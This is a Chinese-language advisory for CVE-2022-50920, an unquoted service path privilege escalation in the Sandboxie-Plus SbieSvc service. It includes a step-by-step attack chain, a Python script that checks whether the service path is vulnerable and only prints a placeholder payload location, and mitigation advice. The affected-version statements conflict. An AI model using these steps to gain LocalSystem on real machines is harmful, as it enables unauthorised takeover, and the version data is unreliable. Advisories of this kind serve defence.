CVE-2022-50920: Sandboxie-Plus SbieSvc服务未引用路径权限提升漏洞

漏洞信息

漏洞编号

CVE-2022-50920

漏洞类型

未引用服务路径（Unquoted Service Path）

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Sandboxie-Plus

漏洞概述

CVE-2022-50920是发现于Sandboxie-Plus 5.50.2版本中的高危安全漏洞。该漏洞存在于Windows服务SbieSvc中，由于其可执行文件路径未使用引号包围，存在未引用服务路径（Unquoted Service Path）问题。本地攻击者可以利用此漏洞将恶意可执行文件放置在服务路径的特定位置，从而在服务重启时以LocalSystem最高权限自动执行，实现权限提升并完全控制受影响系统。该漏洞CVSS评分高达8.4，属于高危级别，对系统机密性、完整性和可用性均造成严重影响。攻击者需要本地访问权限即可实施攻击，无需认证和用户交互。

技术细节

未引用服务路径漏洞是Windows服务配置中的常见安全问题。当Windows服务配置的可执行文件路径包含空格且未被引号包围时，操作系统会按照空格分隔的路径逐级查找并执行程序。例如，若服务路径为C:\Program Files\Sandboxie-Plus\SbieSvc.exe，Windows会依次尝试执行：C:\Program.exe、C:\Program Files\Sandboxie-Plus\SbieSvc.exe等。攻击者可以利用这一特性，在C:\目录下放置名为Program.exe的恶意程序，当SbieSvc服务启动时，系统会优先执行攻击者植入的恶意程序，从而以LocalSystem权限运行任意代码。此漏洞可被本地攻击者用于权限提升，从普通用户权限提升到系统最高权限。

攻击链分析

STEP 1

步骤1

攻击者获得目标系统的本地访问权限（普通用户权限）

STEP 2

步骤2

攻击者识别SbieSvc服务配置，发现BINARY_PATH_NAME包含空格且未使用引号包围

STEP 3

步骤3

攻击者在服务路径的特定位置（如C:\）创建恶意可执行文件（如Program.exe）

STEP 4

步骤4

等待SbieSvc服务重启或触发服务重启

STEP 5

步骤5

Windows在搜索服务路径时优先执行攻击者植入的恶意程序

STEP 6

步骤6

恶意程序以LocalSystem最高权限运行，攻击者实现完全系统控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2022-50920 PoC - Sandboxie-Plus SbieSvc Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability
# Run with administrator privileges

import os
import subprocess
import sys

def check_vulnerability():
    """Check if the system is vulnerable to CVE-2022-50920"""
    try:
        # Query the SbieSvc service configuration
        result = subprocess.run(
            ['sc', 'qc', 'SbieSvc'],
            capture_output=True,
            text=True
        )
        
        if 'BINARY_PATH_NAME' in result.stdout:
            print('[+] SbieSvc service found')
            for line in result.stdout.split('\n'):
                if 'BINARY_PATH_NAME' in line:
                    path = line.split(':', 1)[1].strip()
                    print(f'[+] Current path: {path}')
                    
                    # Check if path is unquoted and contains spaces
                    if ' ' in path and not (path.startswith('"') and path.endswith('"')):
                        print('[!] VULNERABLE: Path is unquoted and contains spaces')
                        return True
                    else:
                        print('[-] NOT VULNERABLE: Path is properly quoted')
                        return False
        else:
            print('[-] SbieSvc service not found')
            return False
            
    except Exception as e:
        print(f'[-] Error: {e}')
        return False

def create_payload():
    """Create a malicious executable to be placed at unquoted path location"""
    payload_path = r'C:\Program.exe'
    
    # This is a placeholder - actual payload would be malicious code
    # For demonstration purposes only
    print(f'[!] Would create malicious executable at: {payload_path}')
    print('[!] When SbieSvc starts, it would execute this payload with LocalSystem privileges')
    
    return payload_path

if __name__ == '__main__':
    print('CVE-2022-50920 - Sandboxie-Plus SbieSvc Unquoted Service Path PoC')
    print('=' * 60)
    check_vulnerability()
    create_payload()

影响范围

Sandboxie-Plus < 5.50.2

防御指南

临时缓解措施

立即限制C:\等系统关键目录的写入权限，确保普通用户无法在这些位置创建可执行文件。同时修改注册表HKLM\SYSTEM\CurrentControlSet\Services\SbieSvc下的ImagePath值，使用引号包围完整路径，或等待官方发布安全更新后立即升级。